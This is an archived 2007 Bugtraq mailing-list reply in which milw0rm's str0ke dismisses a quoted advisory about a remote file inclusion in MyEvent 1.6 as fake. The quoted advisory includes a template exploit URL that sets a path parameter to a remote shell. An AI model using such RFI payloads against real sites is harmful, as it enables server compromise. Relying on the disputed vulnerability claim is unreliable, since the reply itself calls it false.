Re: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability

To: "yaser@xxxxxxxxxxxx" <yaser@xxxxxxxxxxxx>
Subject: Re: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
From: str0ke <str0ke@xxxxxxxxxxx>
Date: Sat, 2 Jun 2007 11:17:09 -0500
Cc: bugtraq@xxxxxxxxxxxxxxxxx
Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=uNPXznePkatAqZBmJjSPCPwUni4NmbEh9leErHLfqlIKgk5BEFAv0s5aXKOQ2VxczcmlvDPQZW8jD6DItD5Dnw73n/kHYShTzrdHjqNS9Xcu2FOPSV6zGhEXUocTBQWjp7kR6T9zfcFXurW33ZQfpqjwqCtP5lEuT3cdYhL2eg8=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:sender:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=RqHsltGA8ln+gwqBmdXG1nWIxwaQ8gRxsNuI9zkjmTe8WDc21wXJ1hVmRcIq+YdEjK7mqk4oUf7yjQjp8zSokKinYelN1IdPcXx8UW0ztnp/XnKq+QMF8TgeJVCHNTc9VileSvZZrBZwiY//B0V2A8cWB4OfTFf9ICcDhiAvQ54=
In-reply-to: <20070602070753.31153.qmail@xxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20070602070753.31153.qmail@xxxxxxxxxxxxxxxxx>
Sender: milw0rm@xxxxxxxxx

Another fake, the entire file is a class.

/str0ke

On 2 Jun 2007 07:07:53 -0000, yaser@xxxxxxxxxxxx <yaser@xxxxxxxxxxxx> wrote:

#########################################################################
 #
 # MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
 #
 # Author:  Yaser <yaser@xxxxxxxxxxxx>
 #
 # Homepage: http://www.ayyildiz.org
 #
 #########################################################################



 #########################################################################
 # Download S : http://mywebland.com/download.php?id=6
 #
 # ERROR:
 #
 # include_once($myevent_path.'includes/template.php')
 #
 # Exploit:
 # http://[site]/[PaTh]/includes/template.php?myevent_path=[shell]
 #
 #########################################################################

 Thanks: ir4dex - ht08 - ajann - H0tturk - Zakix - Devil Hacker

Follow-Ups:
- Recent OpenSSL exploits
  - From: Ryan's spam address

References:
- MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
  - From: yaser

Prev by Date: PBSite - PHP Bulletin Site | CMS ====> RFI
Next by Date: Comdev Web Blogger 4.1 RFI Vulnerability
Previous by thread: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
Next by thread: Recent OpenSSL exploits
Index(es):
- Date
- Thread